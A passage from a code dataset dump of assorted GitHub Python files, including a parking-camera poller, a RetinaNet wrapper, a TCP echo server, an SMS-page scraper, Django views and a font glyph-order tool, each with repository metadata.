'8:B6:1F:39:B2:FC':bcolors.OKGREEN,#1\n '44:17:93:7E:3B:7C':bcolors.OKCYAN,#2\n '8:B6:1F:39:AF:20':bcolors.OKBLUE#3\n}\nasync def get_photo(ip,name):\n global devices\n print('[MAIN-PROCESS]',devices_color[name],'get_photo:',name,ip,bcolors.ENDC)\n for i in devices:\n devices[i][1]=\"lost\"\n try:\n # print(name)\n async with async_timeout.timeout(2):\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://\"+ip+\"/check\") as resp:\n print(resp.headers['Content-Type'])\n\n if resp.status == 200:\n devices[name][1]=\"alive\"\n # print(devices[name][1])\n if resp.headers['Content-Type']==\"image/jpeg\":\n f = await aiofiles.open(\"output/\"+str(name)+\".jpeg\", mode='wb')\n await f.write(await resp.read())\n await f.close()\n print('[MAIN-PROCESS]',devices_color[name],'get_photo',name,'done',bcolors.ENDC,'image')\n return ['image','',name]\n else:\n return ['text',await resp.read(),name]\n else:\n return ['err','400']\n except:\n # if name=='44:17:93:7E:3B:7C':\n print('[MAIN-PROCESS]',devices_color[name],'get_photo',name,'done',bcolors.ENDC,'err')\n return ['err','',name]\n \ndef image_callback(result):# input for a dict(result,mac)\n print('\\t[SUB-PROCESS] recognize result:',result)\n err=[]\n if result['str']:\n if len(result['str'])<6 or len(result['str'])>7:\n err.append('length_error')\n else:\n err.append('non_return')\n \n print('\\t[SUB-PROCESS] recognize error:',result)\n if len(err)>0: #有錯誤的發生\n #錯誤處理\n msg=[{\"mac\":result[\"mac\"]},{\"error\":err}]\n else:\n msg=[{\"mac\":result[\"mac\"]},{\"license_plate\":result[\"str\"],\"status\":\"inuse\"}]\n msg=json.dumps(msg)\n print('\\t[SUB-PROCESS] Parking image type send:',msg)\n send(msg,'Parking')# update parking errors\n\n # print('recognized:',input)\n \nasync def main():\n # 建立 Task 列表\n tasks = []\n for i in devices:\n task=asyncio.create_task(get_photo(devices[i][0],i))\n # task.add_done_callback(print(task.result))\n tasks.append(task)\n\n for k in tasks:\n await k\n result=k.result()# if get one ->do one\n print('\\t\\033[93m[SUB-PROCESS] task_result',result,'\\033[0m')\n if result[0]=='image':\n # print('fuck')\n Pool.apply_async(yolov4.detect.main,args=('output/'+result[2]+'.jpeg',),callback=print,error_callback=print)\n Pool.apply_async(testtt.recognize,args=(result[2],),callback=image_callback,error_callback=print)\n elif result[0]=='text':\n if result[1]=='There\\'s a car inside!':#inuse\n msg=[{\"mac\":result[2]},{\"status\":\"inuse\"}]\n else:#empty\n msg=[{\"mac\":result[2]},{\"status\":\"empty\"}]\n msg=json.dumps(msg)\n send(msg,'Parking')\n return #need to process\n\n\nif __name__=='__main__':# main time loop\n print('updated:\\n',devices)\n Pool=multiprocessing.Pool(processes=1)\n \n ts=0\n while True:\n te=time.monotonic()\n if te-ts>15 or ts==0:\n print('[MAIN-PROCESS]-'*20)\n result=asyncio.run(main())\n \n msg=[]\n for i in devices:\n msg.append([{\"mac\":i},{\"status\":devices[i][1]}])\n print('[MAIN-PROCESS] send:',msg)\n msg=json.dumps(msg)\n send(msg)# send to mqtt\n ts=te\n","repo_name":"Timothychen00/RoadParking","sub_path":"photo.py","file_name":"photo.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39288545425","text":"import torchvision.models as models\nfrom torchvision.models.detection import faster_rcnn, fasterrcnn_resnet50_fpn, retinanet_resnet50_fpn\nfrom torch import nn\nimport torch\nimport math \nimport torchvision\nimport torch.nn.functional as F \nfrom typing import OrderedDict\nclass RetinaNet(nn.Module): \n def __init__(self,cfg):\n super(RetinaNet, self).__init__()\n if cfg.get('customBackbone',None):\n backbone = torchvision.models.detection.backbone_utils.resnet_fpn_backbone(cfg.customBackbone, pretrained = cfg.pretrained_backbone, returned_layers=[2, 3, 4],\n extra_blocks=torchvision.ops.feature_pyramid_network.LastLevelP6P7(256, 256), trainable_layers=cfg.get('trainable_layers',5))\n self.model = torchvision.models.detection.RetinaNet(backbone=backbone, num_classes=2)\n elif cfg.get('custom_anchors',False):\n anchor_sizes = ((16,), (32,), (64,), (128,), (256,))\n aspect_ratios = ((0.8, 1.0, 1.2),) * len(anchor_sizes)\n anchor_generator = torchvision.models.detection.retinanet.AnchorGenerator(anchor_sizes,\n aspect_ratios)\n self.model = retinanet_resnet50_fpn(\n pretrained = cfg.pretrained,\n pretrained_backbone = cfg.pretrained_backbone,\n trainable_backbone_layers = cfg.get('trainable_layers',5),\n anchor_generator = anchor_generator\n )\n \n else: \n self.model = retinanet_resnet50_fpn(\n pretrained = cfg.pretrained,\n pretrained_backbone = cfg.pretrained_backbone,\n trainable_backbone_layers = cfg.get('trainable_layers',5)\n )\n\n\n\n # replace classification layer \n in_features = self.model.head.classification_head.conv[0].in_channels\n num_anchors = self.model.head.classification_head.num_anchors\n self.model.head.classification_head.num_classes = cfg.num_classes\n\n cls_logits = torch.nn.Conv2d(in_features, num_anchors * cfg.num_classes, kernel_size = 3, stride=1, padding=1)\n torch.nn.init.normal_(cls_logits.weight, std=0.01) # as per pytorch code\n torch.nn.init.constant_(cls_logits.bias, -math.log((1 - 0.01) / 0.01)) # as per pytorcch code \n # assign cls head to model\n self.model.head.classification_head.cls_logits = cls_logits\n\n def get_model(self):\n return self.model\n","repo_name":"FinnBehrendt/node21-submit","sub_path":"src/models/modules/RetinaNet.py","file_name":"RetinaNet.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37106089244","text":"import sys\ninput=sys.stdin.readline\n\nstr2=input().strip()\nstr1=input().strip()\ndp=[[0 for _ in range(len(str2)+1)]for _ in range(len(str1)+1)]\nresult=0\nfor i in range(1,len(str1)+1):\n for j in range(1,len(str2)+1):\n if str1[i-1]==str2[j-1]:\n dp[i][j]=dp[i-1][j-1]+1\n result=max((dp[i][j]),result)\n\nprint(result)\n","repo_name":"styughjvbn/Algorithm_study","sub_path":"week11-20/week19/174_5582.py","file_name":"174_5582.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30027284307","text":"\nclass Smoothie:\n prices = {\n \"Strawberries\" : \"$1.50\",\n \"Banana\" : \"$0.50\",\n \"Mango\" : \"$2.50\",\n \"Blueberries\" : \"$1.00\",\n \"Raspberries\" : \"$1.00\",\n \"Apple\" : \"$1.75\",\n \"Pineapple\" : \"$3.50\"\n }\n def __init__(self,ingredients):\n self.ingredients = ingredients\n \n def get_cost(self):\n tot_cost = 0\n for ingredient in self.ingredients:\n tot_cost += float(Smoothie.prices[ingredient][1:])\n return '${:.2f}'.format(tot_cost)\n \n def get_price(self):\n return '${:.2f}'.format(round(float(self.get_cost()[1:]) + 1.5*float(self.get_cost()[1:]), 2))\n \n def get_name(self):\n my_ingredients = sorted(self.ingredients)\n def change_name(names):\n new_lst = []\n for name in names:\n if 'rries' in name:\n new_lst.append(name.replace('rries', 'rry'))\n else:\n new_lst.append(name)\n return new_lst\n my_ingredients = change_name(my_ingredients)\n if len(my_ingredients) == 1:\n name = my_ingredients[0] + ' Smoothie'\n else:\n name = ''\n for ingredient in my_ingredients:\n name += ingredient + ' '\n name += 'Fusion'\n return name\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"yuPWwSbCGPm2KzSzx_17.py","file_name":"yuPWwSbCGPm2KzSzx_17.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73182966171","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef get_data(phone, page):\r\n url = f'https://www.pdflibr.com/SMSContent/{phone}?page={page}'\r\n print(url)\r\n\r\n try:\r\n response = urllib.request.urlopen(url).read()\r\n except:\r\n response = get_data(phone, phone)\r\n\r\n return response\r\n\r\n\r\nphone = 3\r\npages = list(range(1, 101))\r\ntables = []\r\nfor page in pages:\r\n res = get_data(phone, page)\r\n soup = BeautifulSoup(res.decode(), 'lxml')\r\n table = soup.findAll('table')[1]\r\n tables.append(table)\r\nwith open(f'phone_{phone}.txt', 'wb') as f:\r\n for table in tables:\r\n f.write(table.get_text().encode('utf-8'))","repo_name":"cyoahs/spider_for_pdflibr","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32085898263","text":"from socket import * # Módulo/biblioteca para a utilização de sockets\n\nserverData = input('Host/IP Port [Default: localhost 8080]: ') # Recebe os dados da conexão\n\nif serverData == '': # Define padrão para dados da conexão\n serverName = 'localhost' # Define o nome do servidor (endereço ou IP do servidor)\n serverPort = 8080 # Define a porta do servidor\nelse:\n serverName, serverPort = serverData.split()\n serverPort = int(serverPort)\n\nserverSocket = socket(AF_INET, SOCK_STREAM) # Cria o socket do servidor, indicando que a rede está usando IPv4 e que o socket será TCP\n\nprint('<<< Socket created >>>')\n\nserverSocket.bind(('',serverPort)) # Designa número de porta ao socket do servidor\n\nprint('<<< Socket bind complete >>>')\n\n# print('The server is ready to receive')\n\ncount = 0\n\nserverSocket.listen(1) # Escuta requisições de conexão TCP do cliente, indicando número máximo de conexões em fila como 1\n\nwhile 1:\n\n connectionSocket, addr = serverSocket.accept() # Cria um novo socket no servidor (connectionSocket) para o cliente que bateu à porta. Cliente e servidor completam apresentação criando uma conexão TCP\n \n sentence = connectionSocket.recv(1024) # Recebe mensagem do cliente. Define tamanho do buffer como 1024\n\n if sentence.decode() == 'quit': # Fecha conexão se a mensagem do usuário for \"quit\"\n connectionSocket.close()\n break\n\n print('Message [{}]: '.format(addr), sentence.decode()) # Imprime a mensagem vinda do cliente na tela\n\n modifiedMessage = '[{}] OK ::: {}'.format(count, sentence.decode()).encode() # Modifica a mensagem para enviar de volta ao cliente\n connectionSocket.send(modifiedMessage) # Envia mensagem pelo socket específico do cliente para a conexão TCP\n\n count += 1 # Incrementa contador de mensagens\n\n connectionSocket.close() # Fecha o socket, fechando a conexão TCP entre cliente e servidor\n\nprint('<<< Closing connection on server side >>>')","repo_name":"Beilfuss/client-server","sub_path":"TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16824492618","text":"from PIL import ImageFont, Image, ImageDraw\nimport os,sys\ndef toImage(imageFile,x,y,text,pathName,size):\n oo = os.path.dirname(os.path.realpath(sys.argv[0]))\n imageFile = oo + imageFile\n pathName = oo + pathName\n # 导入本地字体路径及设置字体大小\n font = ImageFont.truetype(oo+\"/images/字体/kuaile.ttf\", size)\n # 打开本地所需图片\n im1 = Image.open(imageFile)\n\n # 在图片上添加文字\n draw = ImageDraw.Draw(im1)\n draw.text(xy=(x, y), text=text, font=font,fill=(1, 0, 0))\n\n\n im1.save(pathName)\n\n'''\nline=text\nsize=多少字换行\n'''\ndef line_break(line,size):\n LINE_CHAR_COUNT = size * 2 # 每行字符数:30个中文字符(=60英文字符)\n TABLE_WIDTH = 4\n ret = ''\n width = 0\n for c in line:\n if len(c.encode('utf8')) == 3: # 中文\n if LINE_CHAR_COUNT == width + 1: # 剩余位置不够一个汉字\n width = 2\n ret += '\\n' + c\n else: # 中文宽度加2,注意换行边界\n width += 2\n ret += c\n else:\n if c == '\\t':\n space_c = TABLE_WIDTH - width % TABLE_WIDTH # 已有长度对TABLE_WIDTH取余\n ret += ' ' * space_c\n width += space_c\n elif c == '\\n':\n width = 0\n ret += c\n else:\n width += 1\n ret += c\n if width >= LINE_CHAR_COUNT:\n ret += '\\n'\n width = 0\n if ret.endswith('\\n'):\n return ret\n return ret + '\\n'\n","repo_name":"cat991/py-go-cqhttp","sub_path":"botstart/util/textToImg.py","file_name":"textToImg.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"17934994562","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom .forms import UserForm, CarForm\nfrom .models import Car\n\ndef home(request):\n return render(request, 'myapp/home.html')\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('car_list')\n return render(request, 'myapp/login.html')\n\ndef register(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserForm()\n return render(request, 'myapp/register.html', {'form': form})\n\ndef car_list(request):\n cars = Car.objects.all()\n return render(request, 'myapp/car_list.html', {'cars': cars})\n\ndef car_detail(request, car_id):\n car = Car.objects.get(id=car_id)\n return render(request, 'myapp/car_detail.html', {'car': car})\n\ndef add_car(request):\n if request.method == 'POST':\n form = CarForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('car_list')\n else:\n form = CarForm()\n return render(request, 'myapp/add_car.html', {'form': form})\n\ndef edit_car(request, car_id):\n car = Car.objects.get(id=car_id)\n if request.method == 'POST':\n form = CarForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect('car_list')\n else:\n form = CarForm(instance=car)\n return render(request, 'myapp/edit_car.html', {'form': form})\n","repo_name":"ToDpain/IS-424-Project","sub_path":"HelloWorld/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12736263074","text":"import json\nfrom logging import Logger\nimport redis\n\nfrom alocacao import bootstrap, config\nfrom alocacao.dominio import comandos\n\n\nlogger = Logger(__name__)\nr = redis.Redis(**config.get_redis_host_and_port())\nbus = bootstrap.bootstrap()\n\n\ndef main():\n pubsub = r.pubsub(ignore_subscribe_messages=True)\n pubsub.subscribe('altera_quantidade_lote')\n\n for m in pubsub.listen():\n handle_altera_quantidade_lote(m)\n\n\ndef handle_altera_quantidade_lote(m):\n logger.debug('manipulando %s', m)\n data = json.loads(m['data'])\n cmd = comandos.AlterarQuantidadeLote(\n ref=data['ref_lote'], qtd_nova=data['qtd_nova']\n )\n bus.handle(cmd)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ralphribeiro/APWP-T2","sub_path":"src/alocacao/aplicacao/redis_eventconsumer.py","file_name":"redis_eventconsumer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28816076927","text":"#!/usr/bin/env python\n# encoding: utf8\nfrom __future__ import print_function\nimport os, sys, plistlib, json, re\nfrom collections import OrderedDict\nfrom argparse import ArgumentParser\nfrom ConfigParser import RawConfigParser\nfrom fontTools import ttLib\nfrom robofab.objects.objectsRF import OpenFont\n\n\n# Regex matching \"default\" glyph names, like \"uni2043\" and \"u01C5\"\nuniNameRe = re.compile(r'^u(?:ni)([0-9A-F]{4,8})$')\n\n\nclass PList:\n def __init__(self, filename):\n self.filename = filename\n self.plist = None\n\n def load(self):\n self.plist = plistlib.readPlist(self.filename)\n\n def save(self):\n if self.plist is not None:\n plistlib.writePlist(self.plist, self.filename)\n\n def get(self, k, defaultValue=None):\n if self.plist is None:\n self.load()\n return self.plist.get(k, defaultValue)\n\n def __getitem__(self, k):\n if self.plist is None:\n self.load()\n return self.plist[k]\n\n def __setitem__(self, k, v):\n if self.plist is None:\n self.load()\n self.plist[k] = v\n\n def __delitem__(self, k):\n if self.plist is None:\n self.load()\n del self.plist[k]\n\n\ndef parseAGL(filename): # -> { 2126: 'Omega', ... }\n m = {}\n with open(filename, 'r') as f:\n for line in f:\n # Omega;2126\n # dalethatafpatah;05D3 05B2 # higher-level combinations; ignored\n line = line.strip()\n if len(line) > 0 and line[0] != '#':\n name, uc = tuple([c.strip() for c in line.split(';')])\n if uc.find(' ') == -1:\n # it's a 1:1 mapping\n m[int(uc, 16)] = name\n return m\n\n\ndef revCharMap(ucToNames):\n # {2126:['Omega','Omegagr']} -> {'Omega':2126, 'Omegagr':2126}\n # {2126:'Omega'} -> {'Omega':2126}\n m = {}\n if len(ucToNames) == 0:\n return m\n\n lists = True\n for v in ucToNames.itervalues():\n lists = not isinstance(v, str)\n break\n\n if lists:\n for uc, names in ucToNames.iteritems():\n for name in names:\n m[name] = uc\n else:\n for uc, name in ucToNames.iteritems():\n m[name] = uc\n \n return m\n\n\ndef loadJSONGlyphOrder(jsonFilename):\n gol = None\n if jsonFilename == '-':\n gol = json.load(sys.stdin)\n else:\n with open(jsonFilename, 'r') as f:\n gol = json.load(f)\n if not isinstance(gol, list):\n raise Exception('expected [[string, int|null]')\n if len(gol) > 0:\n for v in gol:\n if not isinstance(v, list):\n raise Exception('expected [[string, int|null]]')\n break\n return gol\n\n\ndef loadTTGlyphOrder(font):\n if isinstance(font, str):\n font = ttLib.TTFont(font)\n\n if not 'cmap' in font:\n raise Exception('missing cmap table')\n \n bestCodeSubTable = None\n bestCodeSubTableFormat = 0\n\n for st in font['cmap'].tables:\n if st.platformID == 0: # 0=unicode, 1=mac, 2=(reserved), 3=microsoft\n if st.format > bestCodeSubTableFormat:\n bestCodeSubTable = st\n bestCodeSubTableFormat = st.format\n\n ucmap = {}\n if bestCodeSubTable is not None:\n for cp, glyphname in bestCodeSubTable.cmap.items():\n ucmap[glyphname] = cp\n\n gol = []\n for name in font.getGlyphOrder():\n gol.append((name, ucmap.get(name)))\n\n return gol\n\n\ndef loadSrcGlyphOrder(jsonFilename, fontFilename): # -> [ ('Omegagreek', 2126|None), ...]\n if jsonFilename:\n return loadJSONGlyphOrder(jsonFilename)\n elif fontFilename:\n return loadTTGlyphOrder(fontFilename.rstrip('/ '))\n return None\n\n\ndef loadUFOGlyphNames(ufoPath):\n font = OpenFont(ufoPath)\n\n libPlist = PList(os.path.join(ufoPath, 'lib.plist')) \n orderedNames = libPlist['public.glyphOrder'] # [ 'Omega', ...]\n \n # append any glyphs that are missing in orderedNames\n allNames = set(font.keys())\n for name in orderedNames:\n allNames.discard(name)\n for name in allNames:\n orderedNames.append(name)\n \n ucToNames = font.getCharacterMapping() # { 2126: [ 'Omega', ...], ...}\n nameToUc = revCharMap(ucToNames) # { 'Omega': 2126, ...}\n\n gol = OrderedDict() # OrderedDict{ ('Omega', 2126|None), ...}\n for name in orderedNames:\n gol[name] = nameToUc.get(name)\n # gol.append((name, nameToUc.get(name)))\n\n return gol, ucToNames, nameToUc, libPlist\n\n\ndef saveUFOGlyphOrder(libPlist, orderedNames, dryRun):\n libPlist['public.glyphOrder'] = orderedNames\n\n roboSort = libPlist.get('com.typemytype.robofont.sort')\n if roboSort is not None:\n # lib['com.typemytype.robofont.sort'] has schema\n # [ { type: \"glyphList\", ascending: [glyphname, ...] }, ...]\n for i in range(len(roboSort)):\n ent = roboSort[i]\n if isinstance(ent, dict) and ent.get('type') == 'glyphList':\n roboSort[i] = {'type':'glyphList', 'ascending':orderedNames}\n break\n\n print('Writing', libPlist.filename)\n if not dryRun:\n libPlist.save()\n\n\ndef getConfigResFile(config, basedir, name):\n fn = os.path.join(basedir, config.get(\"res\", name))\n if not os.path.isfile(fn):\n basedir = os.path.dirname(basedir)\n fn = os.path.join(basedir, config.get(\"res\", name))\n if not os.path.isfile(fn):\n fn = None\n return fn\n\n\ndef main():\n argparser = ArgumentParser(description='Rewrite glyph order of UFO fonts')\n\n argparser.add_argument(\n '-dry', dest='dryRun', action='store_const', const=True, default=False,\n help='Do not modify anything, but instead just print what would happen.')\n\n argparser.add_argument(\n '-src-json', dest='srcJSONFile', metavar='', type=str,\n help='JSON file to read glyph order from.' +\n ' Should be a list e.g. [[\"Omega\", 2126], [\".notdef\", null], ...]')\n\n argparser.add_argument(\n '-src-font', dest='srcFontFile', metavar='', type=str,\n help='TrueType or OpenType font to read glyph order from.')\n\n argparser.add_argument(\n '-out', dest='outFile', metavar='', type=str,\n help='Write each name per line to ')\n\n argparser.add_argument(\n 'dstFontsPaths', metavar='', type=str, nargs='+', help='UFO fonts to update')\n\n args = argparser.parse_args()\n dryRun = args.dryRun\n\n if args.srcJSONFile and args.srcFontFile:\n argparser.error('Both -src-json and -src-font specified -- please provide only one.')\n\n srcGol = loadSrcGlyphOrder(args.srcJSONFile, args.srcFontFile)\n if srcGol is None:\n argparser.error('No source provided (-src-* argument missing)')\n\n # Load Adobe Glyph List database\n srcDir = os.path.dirname(args.dstFontsPaths[0])\n config = RawConfigParser(dict_type=OrderedDict)\n config.read(os.path.join(srcDir, 'fontbuild.cfg'))\n aglUcToName = parseAGL(getConfigResFile(config, srcDir, 'agl_glyphlistfile'))\n aglNameToUc = revCharMap(aglUcToName)\n\n glyphorderUnion = OrderedDict()\n\n for dstFontPath in args.dstFontsPaths:\n glyphOrder, ucToNames, nameToUc, libPlist = loadUFOGlyphNames(dstFontPath)\n\n newGol = OrderedDict()\n for name, uc in srcGol:\n\n if uc is None:\n # if there's no unicode associated, derive from name if possible\n m = uniNameRe.match(name)\n if m:\n try:\n uc = int(m.group(1), 16)\n except:\n pass\n if uc is None:\n uc = aglNameToUc.get(name)\n\n # has same glyph mapped to same unicode\n names = ucToNames.get(uc)\n if names is not None:\n for name in names:\n # print('U %s U+%04X' % (name, uc))\n newGol[name] = uc\n continue\n \n # has same name in dst?\n uc2 = glyphOrder.get(name)\n if uc2 is not None:\n # print('N %s U+%04X' % (name, uc2))\n newGol[name] = uc2\n continue\n\n # Try AGL[uc] -> name == name\n if uc is not None:\n name2 = aglUcToName.get(uc)\n if name2 is not None:\n uc2 = glyphOrder.get(name2)\n if uc2 is not None:\n # print('A %s U+%04X' % (name2, uc2))\n newGol[name2] = uc2\n continue\n \n # else: ignore glyph name in srcGol not found in target\n # if uc is None:\n # print('x %s -' % name)\n # else:\n # print('x %s U+%04X' % (name, uc))\n\n\n # add remaining glyphs from original glyph order\n for name, uc in glyphOrder.iteritems():\n if name not in newGol:\n # print('E %s U+%04X' % (name, uc))\n newGol[name] = uc\n\n orderedNames = []\n for name in newGol.iterkeys():\n orderedNames.append(name)\n glyphorderUnion[name] = True\n\n saveUFOGlyphOrder(libPlist, orderedNames, dryRun)\n\n if args.outFile:\n print('Write', args.outFile)\n glyphorderUnionNames = glyphorderUnion.keys()\n if not dryRun:\n with open(args.outFile, 'w') as f:\n f.write('\\n'.join(glyphorderUnionNames) + '\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rsms/inter","sub_path":"misc/tools/rewrite-glyphorder.py","file_name":"rewrite-glyphorder.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":16264,"dataset":"github-code","pt":"32"} +{"seq_id":"39711166039","text":"atBats = int(input())\nsum = 0.0\n\nnums = list(map(int, input().split()))\n\nok = list(filter((-1).__ne__, nums))\n\nfor i in range(len(ok)):\n sum += ok[i]\n \n \nprint(sum/len(ok))","repo_name":"a5vh/kattis","sub_path":"batter.py","file_name":"batter.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1990856240","text":"import codecs\nimport os\nfrom setuptools import setup\n\n\nname = 'cryptoyaml'\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n \"\"\"\n Build an absolute path from *parts* and and return the contents of the\n resulting file. Assume UTF-8 encoding.\n \"\"\"\n with codecs.open(os.path.join(HERE, *parts), \"rb\", \"utf-8\") as f:\n return f.read()\n\n\nLONG = (\n read(\"README.rst\") + \"\\n\\n\" +\n \"Release Information\\n\" +\n \"===================\\n\\n\" +\n read(\"CHANGES.rst\") + \"\\n\\n\"\n)\n\n\nsetup(\n name=name,\n version_format='{tag}.{commitcount}+{gitsha}',\n url='https://github.com/getsenic/senic.cryptoyaml',\n author='Senic GmbH',\n author_email='tom@senic.com',\n description='A python library to manage encrypted YAML files.',\n license='BSD 2-Clause License',\n long_description=LONG,\n classifiers=[\n \"Programming Language :: Python\",\n ],\n packages=[name],\n include_package_data=True,\n package_dir={name: 'cryptoyaml'},\n package_data={\n name: [\n '.coveragerc',\n 'tests/*.py',\n 'tests/data/*.*',\n ],\n },\n zip_safe=False,\n setup_requires=[\n 'setuptools-git >= 0',\n 'setuptools-git-version'\n ],\n install_requires=[\n 'click',\n 'PyYAML',\n 'cryptography',\n ],\n extras_require={\n 'development': [\n 'devpi-client',\n 'docutils',\n 'pyflakes',\n 'flake8',\n 'mock',\n 'pbr',\n 'pdbpp',\n 'pep8 < 1.6',\n 'pytest',\n 'pytest-cov',\n 'pytest-flakes',\n 'pytest-pep8',\n 'pytest-sugar',\n 'repoze.sphinx.autointerface',\n 'setuptools-git',\n 'Sphinx',\n 'tox',\n ],\n },\n entry_points=\"\"\"\n [console_scripts]\n cryptoyaml = cryptoyaml.commands:main\n [pytest11]\n cryptoyaml = cryptoyaml.testing\n \"\"\",\n)\n","repo_name":"getsenic/senic.cryptoyaml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19687742072","text":"# -*- coding: utf-8 -*- \r\nfrom ..core import *\r\nfrom ..autograd import *\r\n\r\nclass BatchNorm(Function):\r\n @staticmethod\r\n def forward(x, mean, std, weight, bias, axis, eps=1e-5):\r\n '''Applies Batch Normalization for each channel across a batch of data.\\n\r\n Args:\r\n x (Tensor): input tensor.\r\n mean (ndarray): running mean of the input tensor.\r\n std (ndarray): running std of the input tensor.\r\n weight (Tensor): weight to apply.\r\n bias (Tensor): bias to apply. \r\n axis (list): axis indicates the all the axis in the input except C dimention \r\n eps (float): a value added to the denominator for numerical stability.\r\n Shape:\r\n - Input: [N,C,*]\r\n - Output: [N,C,*]\r\n '''\r\n tmp = np.divide(np.subtract(x.data, mean), np.add(std, eps))\r\n result = Tensor(np.add(np.multiply(tmp, weight.data), bias.data))\r\n result.set_creator(BatchNorm.prepare(result.shape, x, weight, bias, mean=mean, std=std, eps=eps, tmp=tmp, axis=axis))\r\n x.child.append(id(result.creator))\r\n weight.child.append(id(result.creator))\r\n bias.child.append(id(result.creator))\r\n return result\r\n\r\n def calc_grad(self, dx):\r\n db = np.sum(dx, axis=self.kwargs['axis'], keepdims=True)\r\n dw = np.sum(np.multiply(self.kwargs['tmp'], dx), axis=self.kwargs['axis'], keepdims=True)\r\n tmp1 = np.multiply(dx, self.var[1].data)\r\n tmp2 = np.subtract(self.var[0].data, self.kwargs['mean'])\r\n tmp3 = np.mean(np.multiply(tmp2, tmp1), axis=self.kwargs['axis'], keepdims=True)\r\n tmp4 = np.add(self.kwargs['std'], self.kwargs['eps'])\r\n tmp5 = np.divide(np.subtract(tmp1, np.divide(np.multiply(tmp2,tmp3), np.square(tmp4))), tmp4)\r\n result = np.subtract(tmp5, np.mean(tmp5, axis=self.kwargs['axis'], keepdims=True))\r\n return result, dw, db\r\n\r\nbatch_norm = BatchNorm(None)","repo_name":"Kashu7100/Qualia2.0","sub_path":"qualia2/functions/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"32"} +{"seq_id":"36564231964","text":"from django.conf.urls import url, include, patterns\nfrom . import views, ajax\n\nurlpatterns = [\n url(r'^login/$', views.login, name='login'),\n\n url(r'^logout/$', views.logout, name='logout'),\n\n url(r'^forget_pwd/$', views.forget_pwd, name='forget_pwd'),\n\n url(r'^reset_pwd/$', views.reset_pwd, name='reset_pwd'),\n\n url(r'^active_account/$', views.active_account, name='active_account'),\n\n url(r'^perfect_admin/$', views.perfect_admin, name='perfect_admin'),\n\n url(r'^perfect_instructor/$', views.perfect_instructor, name='perfect_instructor'),\n\n url(r'^perfect_student/$', views.perfect_student, name='perfect_student'),\n\n url(r'^show_speciality/$', views.show_speciality, name='show_speciality'),\n\n url(r'^show_academy/$', views.show_academy, name='show_academy'),\n\n url(r'^show_admin/$', views.show_admin, name='show_admin'),\n\n url(r'^show_group/$', views.show_group, name='show_group'),\n\n url(r'^show_instructor/$', views.show_instructor, name='show_instructor'),\n\n url(r'^show_student/$', views.show_student, name='show_student'),\n\n url(r'^show_thesis/$', views.show_thesis, name='show_thesis'),\n\n url(r'^show_thesis_self/$', views.show_thesis_self, name='show_thesis_self'),\n\n url(r'^show_thesis_single/$', views.show_thesis_single, name='show_thesis_single'),\n\n url(r'^show_papersection/$', views.show_papersection, name='show_papersection'),\n\n url(r'^show_papersection_single/$', views.show_papersection_single, name='show_papersection_single'),\n\n url(r'^show_papersection_self/$', views.show_papersection_self, name='show_papersection_self'),\n\n\n]\n\nurlpatterns += [\n\n url(r'^content/create_group/$', ajax.create_group),\n url(r'^content/delete_group/$', ajax.delete_group),\n\n url(r'^content/create_academy/$', ajax.create_academy),\n url(r'^content/delete_academy/$', ajax.delete_academy),\n\n url(r'^content/create_speciality/$', ajax.create_speciality),\n url(r'^content/delete_speciality/$', ajax.delete_speciality),\n\n url(r'^content/create_admin/$', ajax.create_admin),\n url(r'^content/delete_admin/$', ajax.delete_admin),\n\n url(r'^content/create_instructor/$', ajax.create_instructor),\n url(r'^content/delete_instructor/$', ajax.delete_instructor),\n\n url(r'^content/create_student/$', ajax.create_student),\n url(r'^content/delete_student/$', ajax.delete_student),\n\n\n url(r'^content/create_thesis/$', ajax.create_thesis),\n url(r'^content/delete_thesis/$', ajax.delete_thesis),\n url(r'^content/choice_thesis/$', 